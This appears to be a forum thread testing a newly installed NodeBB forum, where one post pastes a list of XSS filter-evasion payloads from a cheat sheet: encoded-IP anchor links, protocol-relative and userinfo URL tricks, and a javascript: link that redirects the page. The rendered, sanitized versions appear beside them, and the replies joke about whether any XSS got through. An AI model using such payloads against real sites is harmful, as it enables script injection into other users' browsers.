S</A> <a href="/">XSS</a> XSS Hex Encoding <A » HREF="http://0x42.0x0000066. » 0x7.0x93/">XSS</A> <a href="/">XSS</a> XSS Octal Encoding <A » HREF="http://0102.0146.0007. 
» 00000223/">XSS</A> <a href="/">XSS</a> XSS Mixed Encoding <A » HREF="h tt\tp://6 6.00014 » 6.0x7.147/">XSS</A> <a » href="h%20tt%20p%3A//6%206.0 » 00146.0x7.147/">XSS</a> XSS Protocol Resolution Bypass <A » HREF="//www.google.com/">XSS » </A> <a>XSS</a> XSS Firefox Lookups 1 <A HREF="//google">XSS</A> <a href="//google">XSS</a> XSS Firefox Lookups 2 <A » HREF="http://ha.ckers.org@go » ogle">XSS</A> <a » href="http://google">XSS</a> XSS Firefox Lookups 3 <A » HREF="http://google:ha.ckers » .org">XSS</A> <a » href="http://google">XSS</a> XSS Removing Cnames <A » HREF="http://google.com/">XS » S</A> <a>XSS</a> XSS Extra dot for Absolute DNS <A » HREF="http://www.google.com. » /">XSS</A> <a>XSS</a> XSS JavaScript Link Location <A » HREF="javascript:document.lo » cation='http://www.google.co » m/'">XSS</A> <a>XSS</a> XSS Content Replace <A » HREF="http://www.gohttp://ww » w.google.com/ogle.com/">XSS< » /A> <a » href="http://www.gohttp//www » .google.com/ogle.com/">XSS</ » a> XSS</script>




  • Well, it's been hours since we switched to NodeBB and no one has found any obvious XSS exploits. So that beats Discourse.



  • @anonymous234 no, @Maciejasjmj found one.

